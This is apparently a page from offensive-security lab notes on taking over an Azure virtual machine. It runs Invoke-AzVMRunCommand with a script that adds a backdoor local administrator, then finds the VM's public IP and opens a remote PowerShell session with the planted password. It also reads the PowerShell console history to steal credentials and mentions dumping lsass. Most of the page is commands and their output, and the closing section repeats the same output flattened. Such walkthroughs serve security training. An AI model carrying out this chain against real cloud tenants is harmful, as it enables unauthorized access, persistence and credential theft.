Execute commands on VM

If you have a token that has the permissions to execute commands on a VM, you can of course get access on the VM.

Get-AzRoleAssignment

Run command on VM

Invoke-AzVMRunCommand -VMname bkpadconnect -ResourceGroupName Engineering -CommandId 'RunPowerShellScript' -ScriptPath C:\AzAD\Tools\adduser.ps1 -Verbose

In this case, we add a user to the VM and add that local user to the local administrators.

adduser.ps1

$passwd = ConvertTo-SecureString "StudXPassword@123" -AsPlainText -Force
New-LocalUser -Name student60 -Password $passwd 
Add-LocalGroupMember -Group Administrators -Member student60

A VM in Azure is very likely being monitored/protected by Azure's security mechanisms. So doing a reverse shell may get blocked

Get Public IP of VM

First, get the network interfaces that our token can read:

PS C:\Users\studentuser60> (Get-AzVM -name bkpadconnect -ResourceGroupName Engineering | select -ExpandProperty NetworkProfile).NetworkInterfaces

Primary DeleteOption Id
------- ------------ --
                     /subscriptions/b413826f-108d-4049-8c11-xxxx/resourceGroups/Engineering/providers/Microsoft.Network/networkInterfaces/bkpadconnect368

The name of the interface is bkpadconnect368. We can now get the details for the interface:

PS C:\Users\studentuser60> Get-AzNetworkInterface -name bkpadconnect368


Name                        : bkpadconnect368
IpConfigurations            : [
                                {
                                  "Name": "ipconfig1",
                                  "Etag": "W/\"305e619b-30e6-491c-a185-xxxx\"",
                                  "Id": "/subscriptions/b413826f-108d-4049-8c11-xxx/resourceGroups/Engineering/providers/Microsoft.Network/networkInterfaces/bkpadconnect368/ipConfigurations/ipconfig1",
                                  "PrivateIpAddress": "10.0.0.4",
                                  "PrivateIpAllocationMethod": "Dynamic",
                                  "Subnet": {
                                    "Id": "/subscriptions/b413826f-108d-4049-8c11-xxxx/resourceGroups/Engineering/providers/Microsoft.Network/virtualNetworks/Engineering-vnet/subnets/default",
                                    "IpAllocations": []
                                  },
                                  "PublicIpAddress": {
                                    "IpTags": [],
                                    "Zones": [],
                                    "Id": "/subscriptions/b413826f-108d-4049-8c11-xxxxx/resourceGroups/Engineering/providers/Microsoft.Network/publicIPAddresses/bkpadconnectIP"
                                  },

This will tell you the ID name of the publicIPAddress: bkpadconnectIP. Using this information, we can get the public IP using:

PS C:\Users\studentuser60> Get-AzPublicIpAddress -Name bkpadconnectIP


Name                     : bkpadconnectIP
ResourceGuid             : a6e23b55-d8b1-4e0e-9fda-xxxxx
ProvisioningState        : Succeeded
Tags                     :
PublicIpAllocationMethod : Dynamic
IpAddress                : 1.1.1.1

Connect to VM

PS C:\Users\studentuser60>  $passwd = ConvertTo-SecureString "StudXPassword@123" -AsPlainText -Force
PS C:\Users\studentuser60>  $creds =  New-Object System.management.automation.pscredential ("student60", $passwd)
PS C:\Users\studentuser60> $sess = New-PSSession 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
PS C:\Users\studentuser60> Enter-PSSession $sess
[1.1.1.1]: PS C:\Users\student60\Documents>

Extract credentials from VM

For example, read console history:

 cat C:\Users\bkpadconnect\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Or dump lsass etc.

PreviousAutomation Accounts NextKey Vault

Last updated 17 hours ago

PS C:\Users\studentuser60> (Get-AzVM -name bkpadconnect -ResourceGroupName Engineering | select -ExpandProperty NetworkProfile).NetworkInterfaces Primary DeleteOption Id ------- ------------ -- /subscriptions/b413826f-108d-4049-8c11-xxxx/resourceGroups/Engineering/providers/Microsoft.Network/networkInterfaces/bkpadconnect368

PS C:\Users\studentuser60> Get-AzNetworkInterface -name bkpadconnect368 Name : bkpadconnect368 IpConfigurations : [ { "Name": "ipconfig1", "Etag": "W/\"305e619b-30e6-491c-a185-xxxx\"", "Id": "/subscriptions/b413826f-108d-4049-8c11-xxx/resourceGroups/Engineering/providers/Microsoft.Network/networkInterfaces/bkpadconnect368/ipConfigurations/ipconfig1", "PrivateIpAddress": "10.0.0.4", "PrivateIpAllocationMethod": "Dynamic", "Subnet": { "Id": "/subscriptions/b413826f-108d-4049-8c11-xxxx/resourceGroups/Engineering/providers/Microsoft.Network/virtualNetworks/Engineering-vnet/subnets/default", "IpAllocations": [] }, "PublicIpAddress": { "IpTags": [], "Zones": [], "Id": "/subscriptions/b413826f-108d-4049-8c11-xxxxx/resourceGroups/Engineering/providers/Microsoft.Network/publicIPAddresses/bkpadconnectIP" },

PS C:\Users\studentuser60> Get-AzPublicIpAddress -Name bkpadconnectIP Name : bkpadconnectIP ResourceGuid : a6e23b55-d8b1-4e0e-9fda-xxxxx ProvisioningState : Succeeded Tags : PublicIpAllocationMethod : Dynamic IpAddress : 1.1.1.1

PS C:\Users\studentuser60> $passwd = ConvertTo-SecureString "StudXPassword@123" -AsPlainText -Force PS C:\Users\studentuser60> $creds = New-Object System.management.automation.pscredential ("student60", $passwd) PS C:\Users\studentuser60> $sess = New-PSSession 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer) PS C:\Users\studentuser60> Enter-PSSession $sess [1.1.1.1]: PS C:\Users\student60\Documents>